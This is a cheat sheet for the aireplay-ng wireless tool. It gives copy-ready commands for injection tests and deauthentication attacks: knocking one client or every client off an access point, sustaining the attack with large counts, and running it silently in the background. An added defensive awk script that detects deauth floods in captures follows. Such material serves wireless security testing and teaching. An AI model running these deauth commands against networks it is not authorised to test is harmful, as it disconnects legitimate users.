Aireplay-ng (Generate-Traffic)

Aireplay-ng

Aireplay-ng is primarily useful for generating wireless traffic.

Aireplay-ng supports the following attacks. They are listed along with the corresponding number from the tool’s documentation.

ATTACK  ATTACK NAME
0       Deauthentication
1       Fake Authentication
2       Interactive Packet Replay
3       ARP Request Replay Attack
4       KoreK ChopChop Attack
5       Fragmentation Attack
6       Café-Latte Attack
7       Client-Oriented Fragmentation Attack
8       WPA Migration Mode Attack
9       Injection Test
# Check if we can inject in visible APs. The injection test measures ping response times to the AP
sudo aireplay-ng -9 wlan0mon

# Check if we can inject in a specific AP (-9 selects the injection test; without an attack mode aireplay-ng does not run)
sudo aireplay-ng -9 -e <ap_name> -a <MAC> wlan0mon

Deauthentication Attack

# Deauth a client. The number after -0 is the deauth count (10 here); a large number such as 1000000 keeps the deauth attack working for a while:
sudo aireplay-ng -0 10 -a <bssid> -c <client_MAC> wlan0mon

# Run the command in the background and discard its output
sudo aireplay-ng --deauth 10 -a <bssid> -c <client_MAC> wlan0mon &> /dev/null &

# To deauth every client connected to a BSSID, don't specify a client <MAC>
aireplay-ng --deauth 4 -a <bssid> wlan0mon &> /dev/null &

# Can be done as well by using broadcast MAC "FF:FF:FF:FF:FF:FF" 
aireplay-ng --deauth 4 -a <bssid> -c FF:FF:FF:FF:FF:FF wlan0mon

# Same as above, but without expecting to receive probes
sudo aireplay-ng -e <ap_name> -a <MAC> -D wlan0mon

# If we have two Wi-Fi cards, wlan0mon and wlan1mon, run a card-to-card test to make sure they can inject. If it says 5/7 error, the card can still be used to attack an AP
sudo aireplay-ng -9 -i wlan1mon wlan0mon
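
Seen from the monitoring side, the deauthentication runs above appear as bursts of deauth frames for one BSSID, addressed either to a single client or to the broadcast address. The following is an added example, not part of the original post: a shell function that flags such bursts in a list of captured deauth frames. The input format, the sample frames, the function names, the 5-second window and the threshold of 20 are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (not from the original post).
# Input: one deauth frame per line, tab-separated:
#   epoch_seconds <TAB> bssid <TAB> destination_mac
# Lines like this could be exported from a capture with, for example:
#   tshark -r capture.pcap -Y 'wlan.fc.type_subtype == 12' \
#          -T fields -e frame.time_epoch -e wlan.bssid -e wlan.da

# Constructed sample data (not a real capture).
sample_deauth_frames() {
    awk 'BEGIN {
        # 40 deauths to one client in under 2 seconds
        for (i = 0; i < 40; i++)
            printf "%.2f\t02:00:00:00:00:01\t02:00:00:00:00:aa\n", 1000 + i * 0.05
        # 30 deauths to the broadcast address in under 3 seconds
        for (i = 0; i < 30; i++)
            printf "%.2f\t02:00:00:00:00:02\tff:ff:ff:ff:ff:ff\n", 1010 + i * 0.1
        # two isolated deauths, as seen in normal disconnects
        printf "1100.00\t02:00:00:00:00:03\t02:00:00:00:00:bb\n"
        printf "1200.00\t02:00:00:00:00:03\t02:00:00:00:00:bb\n"
    }'
}

# detect_deauth_flood [window_seconds] [threshold]
# Counts deauth frames per (bssid, destination) in fixed time windows and
# prints: bssid <TAB> destination <TAB> peak_count <TAB> scope
# for every pair whose busiest window reaches the threshold.
detect_deauth_flood() {
    awk -F '\t' -v w="${1:-5}" -v t="${2:-20}" '
    NF >= 3 {
        key = tolower($2) "\t" tolower($3)
        n = ++count[key "\t" int($1 / w)]
        if (n > peak[key]) peak[key] = n
    }
    END {
        for (key in peak) {
            if (peak[key] < t) continue
            split(key, f, "\t")
            scope = (f[2] == "ff:ff:ff:ff:ff:ff") ? "broadcast" : "client"
            printf "%s\t%s\t%d\t%s\n", f[1], f[2], peak[key], scope
        }
    }' | sort
}

# Stand-alone run over the constructed sample.
sample_deauth_frames | detect_deauth_flood 5 20
```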

Pro Tips

# with "jobs" we can see the jobs backgrounded with &. each has an ID
jobs

# kill all backgrounded aireplay processes.
killall aireplay-ng 

# kill only the first process in the "jobs" list:
kill %1